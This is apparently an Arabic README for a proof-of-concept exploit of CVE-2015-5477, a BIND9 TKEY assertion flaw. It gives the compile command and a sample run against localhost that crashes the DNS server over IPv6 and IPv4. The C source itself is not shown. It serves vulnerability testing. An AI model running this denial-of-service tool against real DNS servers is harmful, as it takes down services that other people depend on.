
استغلال PoC لـ CVE-2015-5477 فشل تأكيد TKEY في BIND9
يختبر هذا الاستغلال ما إذا كان خادم BIND9 ضعيفًا عن طريق إرسال الاستغلال لمعرفة ما إذا كان يتعطل.
هو كود C تقوم بتجميعه بالطريقة العادية على Unix/Window، مثل:
# gcc tkill.c -o tkill
سيعمل عبر كل من IPv4 و IPv6.
هذا ما يبدو عليه عند تشغيله ضد localhost. نظرًا لأنه يحصل على عنواني IP لتحليل الاسم، فسيحاول كليهما.
يقوم أولاً بالاستعلام عن سلسلة "الإصدار"، ثم يرسل الاستغلال. عندما يفحص العنوان الثاني، يفشل استعلام الإصدار لأن الخدمة قد تعطلت بالفعل من المحاولة الأولى.
root@kali:~/cve-2015-5477# ./a.out localhost
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] localhost: Resolving to IP address
[+] localhost: Resolved to multiple IPs (NOTE)
[+] ::1: Probing...
[+] Querying version...
[+] ::1: "9.11.0pre-alpha"
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed
[+] 127.0.0.1: Probing...
[+] Querying version...
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] Can't query server, is it crashed already?
[-] Sending exploit anyway.
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed